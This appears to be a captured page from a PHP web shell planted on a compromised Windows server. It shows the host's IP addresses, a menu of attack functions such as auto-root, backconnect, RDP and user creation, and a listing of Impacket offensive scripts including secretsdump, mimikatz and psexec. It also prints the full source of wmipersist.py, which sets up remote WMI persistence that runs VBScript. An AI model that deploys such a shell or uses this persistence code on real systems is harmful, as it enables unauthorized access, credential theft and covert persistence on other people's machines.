Windows NT SRV-DATA 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
: 192.168.213.201 | : 216.73.216.72
Cant Read [ /etc/named.conf ]
8.2.0
ADMINISTRATEUR
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ E ]
[ Z ]
C: /
Python27 /
Scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
GetADUsers.py
10.68
KB
-rw-rw-rw-
GetNPUsers.py
19.23
KB
-rw-rw-rw-
GetUserSPNs.py
24.97
KB
-rw-rw-rw-
addcomputer.py
31.22
KB
-rw-rw-rw-
atexec.py
12.5
KB
-rw-rw-rw-
dcomexec.py
26.16
KB
-rw-rw-rw-
dpapi.py
27.65
KB
-rw-rw-rw-
easy_install-2.7.exe
90.85
KB
-rwxrwxrwx
easy_install.exe
90.85
KB
-rwxrwxrwx
esentutl.py
3.55
KB
-rw-rw-rw-
exchanger.py
41.71
KB
-rw-rw-rw-
findDelegation.py
14.36
KB
-rw-rw-rw-
flask.exe
94.83
KB
-rwxrwxrwx
futurize-script.py
399
B
-rw-rw-rw-
futurize.exe
64
KB
-rwxrwxrwx
futurize.exe.manifest
643
B
-rw-rw-rw-
getArch.py
4.33
KB
-rw-rw-rw-
getPac.py
13.59
KB
-rw-rw-rw-
getST.py
19.81
KB
-rw-rw-rw-
getTGT.py
5.04
KB
-rw-rw-rw-
goldenPac.py
49.36
KB
-rw-rw-rw-
karmaSMB.py
28.32
KB
-rw-rw-rw-
kintercept.py
9.52
KB
-rw-rw-rw-
ldapdomaindump
69
B
-rw-rw-rw-
ldd2bloodhound
86
B
-rw-rw-rw-
ldd2pretty
74
B
-rw-rw-rw-
lookupsid.py
7.7
KB
-rw-rw-rw-
mimikatz.py
10.02
KB
-rw-rw-rw-
mqtt_check.py
3.15
KB
-rw-rw-rw-
mssqlclient.py
7.71
KB
-rw-rw-rw-
mssqlinstance.py
1.5
KB
-rw-rw-rw-
netview.py
22.64
KB
-rw-rw-rw-
nmapAnswerMachine.py
36.72
KB
-rw-rw-rw-
ntfs-read.py
40.73
KB
-rw-rw-rw-
ntlmrelayx.py
20.87
KB
-rw-rw-rw-
pasteurize-script.py
403
B
-rw-rw-rw-
pasteurize.exe
64
KB
-rwxrwxrwx
pasteurize.exe.manifest
645
B
-rw-rw-rw-
ping.py
2.63
KB
-rw-rw-rw-
ping6.py
2.45
KB
-rw-rw-rw-
pip.exe
94.84
KB
-rwxrwxrwx
pip2.7.exe
94.84
KB
-rwxrwxrwx
pip2.exe
94.84
KB
-rwxrwxrwx
psexec.py
20.78
KB
-rw-rw-rw-
raiseChild.py
60.47
KB
-rw-rw-rw-
rdp_check.py
23.15
KB
-rw-rw-rw-
reg.py
19.05
KB
-rw-rw-rw-
registry-read.py
5.23
KB
-rw-rw-rw-
rpcdump.py
8.43
KB
-rw-rw-rw-
rpcmap.py
17.08
KB
-rw-rw-rw-
sambaPipe.py
12.7
KB
-rw-rw-rw-
samrdump.py
10.86
KB
-rw-rw-rw-
secretsdump.py
20.65
KB
-rw-rw-rw-
services.py
17.08
KB
-rw-rw-rw-
smbclient.py
5.13
KB
-rw-rw-rw-
smbexec.py
15.8
KB
-rw-rw-rw-
smbrelayx.py
58.72
KB
-rw-rw-rw-
smbserver.py
4.29
KB
-rw-rw-rw-
sniff.py
3.23
KB
-rw-rw-rw-
sniffer.py
2.27
KB
-rw-rw-rw-
split.py
4.56
KB
-rw-rw-rw-
ticketConverter.py
2.06
KB
-rw-rw-rw-
ticketer.py
42.33
KB
-rw-rw-rw-
wmiexec.py
17.53
KB
-rw-rw-rw-
wmipersist.py
11.36
KB
-rw-rw-rw-
wmiquery.py
8.68
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wmipersist.py
#!C:\Python27\python.exe # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # This script creates/removes a WMI Event Consumer/Filter and link # between both to execute Visual Basic based on the WQL filter # or timer specified. # # Author: # beto (@agsolino) # # Example: # # write a file toexec.vbs the following: # Dim objFS, objFile # Set objFS = CreateObject("Scripting.FileSystemObject") # Set objFile = objFS.OpenTextFile("C:\ASEC.log", 8, true) # objFile.WriteLine "Hey There!" # objFile.Close # # # then execute this script this way, VBS will be triggered once # somebody opens calc.exe: # # wmipersist.py domain.net/adminuser:mypwd@targetHost install -name ASEC # -vbs toexec.vbs # -filter 'SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance # ISA "Win32_Process" AND TargetInstance.Name = "calc.exe"' # # or, if you just want to execute the VBS every XXX milliseconds: # # wmipersist.py domain.net/adminuser:mypwd@targetHost install -name ASEC # -vbs toexec.vbs -timer XXX # # to remove the event: # wmipersist.py domain.net/adminuser:mypwd@targetHost remove -name ASEC # # if you don't specify the password, it will be asked by the script. # domain is optional. # # Reference for: # DCOM/WMI from __future__ import division from __future__ import print_function import sys import argparse import logging from impacket.examples import logger from impacket import version from impacket.dcerpc.v5.dcomrt import DCOMConnection from impacket.dcerpc.v5.dcom import wmi from impacket.dcerpc.v5.dtypes import NULL class WMIPERSISTENCE: def __init__(self, username = '', password = '', domain = '', options= None): self.__username = username self.__password = password self.__domain = domain self.__options = options self.__lmhash = '' self.__nthash = '' if options.hashes is not None: self.__lmhash, self.__nthash = options.hashes.split(':') @staticmethod def checkError(banner, resp): if resp.GetCallStatus(0) != 0: logging.error('%s - ERROR (0x%x)' % (banner, resp.GetCallStatus(0))) else: logging.info('%s - OK' % banner) def run(self, addr): dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, options.aesKey, oxidResolver=False, doKerberos=options.k, kdcHost=options.dc_ip) iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login) iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) iWbemLevel1Login.RemRelease() if self.__options.action.upper() == 'REMOVE': self.checkError('Removing ActiveScriptEventConsumer %s' % self.__options.name, iWbemServices.DeleteInstance('ActiveScriptEventConsumer.Name="%s"' % self.__options.name)) self.checkError('Removing EventFilter EF_%s' % self.__options.name, iWbemServices.DeleteInstance('__EventFilter.Name="EF_%s"' % self.__options.name)) self.checkError('Removing IntervalTimerInstruction TI_%s' % self.__options.name, iWbemServices.DeleteInstance( '__IntervalTimerInstruction.TimerId="TI_%s"' % self.__options.name)) self.checkError('Removing FilterToConsumerBinding %s' % self.__options.name, iWbemServices.DeleteInstance( r'__FilterToConsumerBinding.Consumer="ActiveScriptEventConsumer.Name=\"%s\"",' r'Filter="__EventFilter.Name=\"EF_%s\""' % ( self.__options.name, self.__options.name))) else: activeScript ,_ = iWbemServices.GetObject('ActiveScriptEventConsumer') activeScript = activeScript.SpawnInstance() activeScript.Name = self.__options.name activeScript.ScriptingEngine = 'VBScript' activeScript.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0] activeScript.ScriptText = options.vbs.read() self.checkError('Adding ActiveScriptEventConsumer %s'% self.__options.name, iWbemServices.PutInstance(activeScript.marshalMe())) if options.filter is not None: eventFilter,_ = iWbemServices.GetObject('__EventFilter') eventFilter = eventFilter.SpawnInstance() eventFilter.Name = 'EF_%s' % self.__options.name eventFilter.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0] eventFilter.Query = options.filter eventFilter.QueryLanguage = 'WQL' eventFilter.EventNamespace = r'root\cimv2' self.checkError('Adding EventFilter EF_%s'% self.__options.name, iWbemServices.PutInstance(eventFilter.marshalMe())) else: wmiTimer, _ = iWbemServices.GetObject('__IntervalTimerInstruction') wmiTimer = wmiTimer.SpawnInstance() wmiTimer.TimerId = 'TI_%s' % self.__options.name wmiTimer.IntervalBetweenEvents = int(self.__options.timer) #wmiTimer.SkipIfPassed = False self.checkError('Adding IntervalTimerInstruction', iWbemServices.PutInstance(wmiTimer.marshalMe())) eventFilter,_ = iWbemServices.GetObject('__EventFilter') eventFilter = eventFilter.SpawnInstance() eventFilter.Name = 'EF_%s' % self.__options.name eventFilter.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0] eventFilter.Query = 'select * from __TimerEvent where TimerID = "TI_%s" ' % self.__options.name eventFilter.QueryLanguage = 'WQL' eventFilter.EventNamespace = r'root\subscription' self.checkError('Adding EventFilter EF_%s'% self.__options.name, iWbemServices.PutInstance(eventFilter.marshalMe())) filterBinding,_ = iWbemServices.GetObject('__FilterToConsumerBinding') filterBinding = filterBinding.SpawnInstance() filterBinding.Filter = '__EventFilter.Name="EF_%s"' % self.__options.name filterBinding.Consumer = 'ActiveScriptEventConsumer.Name="%s"' % self.__options.name filterBinding.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0] self.checkError('Adding FilterToConsumerBinding', iWbemServices.PutInstance(filterBinding.marshalMe())) dcom.disconnect() # Process command-line arguments. if __name__ == '__main__': # Init the example's logger theme logger.init() print(version.BANNER) parser = argparse.ArgumentParser(add_help = True, description = "Creates/Removes a WMI Event Consumer/Filter and " "link between both to execute Visual Basic based on the WQL filter or timer specified.") parser.add_argument('target', action='store', help='[domain/][username[:password]@]<address>') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') subparsers = parser.add_subparsers(help='actions', dest='action') # A start command install_parser = subparsers.add_parser('install', help='installs the wmi event consumer/filter') install_parser.add_argument('-name', action='store', required=True, help='event name') install_parser.add_argument('-vbs', type=argparse.FileType('r'), required=True, help='VBS filename containing the ' 'script you want to run') install_parser.add_argument('-filter', action='store', required=False, help='the WQL filter string that will trigger' ' the script') install_parser.add_argument('-timer', action='store', required=False, help='the amount of milliseconds after the' ' script will be triggered') # A stop command remove_parser = subparsers.add_parser('remove', help='removes the wmi event consumer/filter') remove_parser.add_argument('-name', action='store', required=True, help='event name') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ' 'ones specified in the command line') group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication ' '(128 or 256 bits)') group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ' 'ommited it use the domain part (FQDN) specified in the target parameter') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) # Print the Library's installation path logging.debug(version.getInstallationPath()) else: logging.getLogger().setLevel(logging.INFO) if options.action.upper() == 'INSTALL': if (options.filter is None and options.timer is None) or (options.filter is not None and options.timer is not None): logging.error("You have to either specify -filter or -timer (and not both)") sys.exit(1) import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( options.target).groups('') #In case the password contains '@' if '@' in address: password = password + '@' + address.rpartition('@')[0] address = address.rpartition('@')[2] try: if domain is None: domain = '' if options.aesKey is not None: options.k = True if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: from getpass import getpass password = getpass("Password:") executer = WMIPERSISTENCE(username, password, domain, options) executer.run(address) except (Exception, KeyboardInterrupt) as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error(e) sys.exit(0)
Close